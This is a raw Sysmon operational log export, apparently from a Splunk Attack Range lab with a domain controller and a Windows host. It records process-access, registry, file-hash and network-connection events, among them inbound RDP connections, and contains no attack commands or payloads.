09:27:16.070{5EBD8912-8D2A-6151-9600-00000000FD01}46324940C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057612Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:16.055{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057611Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:16.055{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057610Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:16.055{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057609Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:16.055{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001057620Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:27:17.789{5EBD8912-8CC0-6151-1000-00000000FD01}440C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b381-0xdd6ec47b) 23542300x80000000000000001057619Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:17.242{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E90E81BBB46CD673B04C9ED0C4641555,SHA256=6A50636300C9A22F859EAC18B27FD656815773212156CC87C2B0C97CD8DF94B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981967Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:17.389{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6B69B7340BC3D2EACEC946EAEE8159D4,SHA256=587006A446ABF10E85438BBC2026E842794EBF5FAB8B6DAA99AC7084AA3491CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981966Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:17.389{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6DA94E601EEFC0F0C6DCE4931C3EE862,SHA256=A50B9E28CC632553E47BDE871D9BAAA9AAE2396B428D657C96C36228B5D56ECB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981965Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:17.124{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C56E192949CD9900884E29C1F9D82E8F,SHA256=0FCD524DF2C6E7E6A2F791EB62DF697C45FBFEAE371D18606CEC0FF3636DFBC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057621Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:18.289{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1A128A365A112546B011E7C02F0E912,SHA256=673ABF691B62EFA53C0411D6308202DB5F3E36F6567147694BEB0EB6EC89B182,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981969Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:18.124{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2347FEC5ACD1C90F81EF2FB71B3BB10B,SHA256=0406E5D9795E55DC82B96EEB18B3CFEA56AD85D1E50C4541BD177F4A0457109A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981968Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:14.721{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60014-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001057622Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:19.367{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46F2DB64860DBA677C2DBC01E22C86E1,SHA256=EBADB4AA85CAF2C46983EC7A9E6D2EE589602B1A1ED68A7F3188ACACC3D53F1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981970Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:19.139{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=657A30FDBA92966D60DB4E7583FBF67F,SHA256=CDDAFFF39DEE9D6F69DF4CA4A91031ACCB175B3F1F31453294693EB442A6A46E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981971Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:20.139{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAF1188018DC7F235EDEFFB6E7F1533B,SHA256=2AB73931065D4E02C92CDA6E32C22399D2B872CFE3FB38BACEBEE56FFA788B7E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057624Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:18.964{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54305-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057623Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:20.383{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA3F0AB181F4AAA6A9F9741751DB3DAA,SHA256=416EC8AA02D910F38230953F7E79674807474039890D6F670DD8126CD64CF419,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057628Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:20.507{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63430-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057627Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:21.852{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EAC819B1605A48D497AA58999C1A4207,SHA256=E93BA3D663A04B657FC5CF5EE46ED46A2C5E2063B0DCC443DA073634C6D83D98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057626Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:21.852{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CF4A9FBE7971BA90236BEF861891A180,SHA256=41D9692FDE429EC8D09DD4B77D1A234F9999585EB0AE6632C2617C09268BF451,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057625Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:21.383{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BD64FDA1F272A997B11AD03E21E6980,SHA256=0C99610689F56576E873970F53AE498A1BEF28100AA58DCEED7ABDAA71DD7B4E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981973Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:17.821{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59582-false10.0.1.12-8000- 23542300x8000000000000000981972Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:21.155{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BC5E3DBDA84C8DA7C31FC8B8B61B348,SHA256=EF350C25CAD53652542784D20566BC09A24C921EF1C2D8DAB87452413CA3A5C1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057631Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:20.674{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60786-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057630Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:22.946{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EAC819B1605A48D497AA58999C1A4207,SHA256=E93BA3D663A04B657FC5CF5EE46ED46A2C5E2063B0DCC443DA073634C6D83D98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057629Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:22.383{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BC22F6ECAFB6F293E855F3A6FF49676,SHA256=0FF2F936D165F90A839EDB2C8F0CFAC90B42BB2634A07DA02D086C3D05EE507C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981974Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:22.170{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F507769F16F07AE9D2B87F4B8CA9266,SHA256=AFFF60C064087DA5783C9A5B68BB100936ABA44DF1D9BC624CFA003536204F01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057632Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:23.620{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B96FF88CCCB31038F52448010E48D121,SHA256=2D8E4777C07E645C41ABBFCEA1F1FC66F4F2F80E679BC4DA93AA95DEEBF3283E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981975Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:23.172{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CC8E6FDFBDF490A3E180C15DF40DD09,SHA256=8DF881D4C23FA426D7EEE01D96BB6C0F9CBDC2954507E7370DED18FE7BECEAC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057633Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:24.839{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B0E7828EC7FA580E3991E4D6F0A22CA,SHA256=B7BF767EB46680864254747B14AD73C8A8A7EBB1B50560C99FA4C4DC4555F179,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981976Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:24.391{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0C27D8C15AA166B7B417067D0CFB88A,SHA256=79E442FAB4A177A9D7328E3F908363F1BC97F7FF47A24F4E83E24082729DC60A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057634Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:25.901{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDB52674FF904638CCB2DB12D76328FD,SHA256=5209EF2A1DE424E54E69ADD3C6349CAF8D918986CBE35EDAEE9D8298A75714F0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981991Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:25.844{69CF5F33-8E7D-6151-307A-00000000FD01}19282328C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981990Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:25.656{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8E7D-6151-307A-00000000FD01}1928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981989Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:25.656{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981988Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:25.656{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981987Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:25.656{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981986Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:25.656{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981985Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:25.656{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981984Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:25.656{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981983Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:25.656{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981982Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 